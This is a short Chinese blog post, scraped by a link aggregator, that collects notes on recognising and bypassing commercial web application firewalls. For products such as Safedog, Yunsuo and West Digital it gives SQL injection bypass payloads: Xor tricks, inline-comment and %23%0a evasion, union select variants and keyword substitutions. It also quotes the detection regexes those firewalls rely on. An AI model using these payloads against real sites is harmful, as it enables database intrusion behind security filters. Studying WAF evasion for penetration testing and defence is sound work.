WAF的识别与绕过思路
source link: https://827607240.github.io/2020/12/03/WAF/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
WAF总结
渗透过程中总会遇到各种各样的WAF,为了方便以后查找资料,先对此进行一些总结。
360网站卫士
Naxsi WAF
云锁v3.1.18.13
Xor绕过
Xor 1=1,Xor 1=2绕过过滤规则
/**/替换为空
/*!*/替换为空
匹配的关键有:and,or,updatexml,select xxx from,union xxx select
匹配select xx from的正则应该是:select .*? from
匹配union xx select的正则应该是:union .*? select360主机卫士或360webscan
OpenRASP
腾讯宙斯盾
SDWAF
长亭SafeLine
DotDefender
UPUPW
网防G01
F5 BIG-IP
西部数码WTS-WAF
加号替换空格绕过
bypass:id=1 an%d 1=2 只需要在关键词中加%即可绕过西部数码云网盾
安全狗v4.0.26550
Xor绕过
Xor 1=1,Xor 1=2绕过
/*/*替换空格绕过
/*/*and/*/*1=2
if 也不拦截
%23a%0a也可以 %23表示# %0a表示换行
union /*!01344select*/ 1,2,3%23绕过
安全狗不拦截/**/之间的内容
bypass:index.php?a=/*&id=1 and 1=2 union select version(),2,3%23*/过滤规则
会拦截一些关键函数,如user(),databse()&&替换and绕过,like替换=绕过。
Mod_Security
奇安信网站卫士
铱讯WAF
未知云WAF
可能存在waf(攻击包被丢弃)
本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!
Recommend
-
8
简单验证码识别及工具编写思路 crystal_lz
-
13
waf 绕过的技巧 livers ·...
-
38
一、前言 这个注入是之前做测试时发现的,但是测试的时候发现有防护,但是想想这么个小网站都绕不过,实在不应该啊。开始补充学习各种场景、各种waf绕过姿势,勉勉强强的成功执行我构造的SQL的语句。趁着还有些印象,...
-
17
*本文不涉及任何漏洞,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 0×00前言 达到目的的手段有很多种,也许存在优劣之分,我只是选择了其中一种我认为好玩的方式。人脸...
-
14
*本文不涉及任何漏洞,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 0×00前言 解决问题的手段有很多种,也许存在优劣之分,这次选择了其中一种不那么好玩的方法——frid...
-
9
【网络安全】文件上传绕过思路
-
6
编写sqlmap Tamper绕过Waf 发布时间 : 2017-10-12 17:10 简单实现tamper主要是实现其中的tamper函数,该函数会在发出请求前调...
-
7
WordPress Hosting...
-
12
WordPress Hosting...
-
7
基于追踪标记的WAF设计思路-51CTO.COM 基于追踪标记的WAF设计思路 作者:XHJ2020 2022-07-29 09:35:25 本文所述WAF从“潜在攻击识别、溯源取证分析"等方面弥补了传统WAF的不足,即保...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK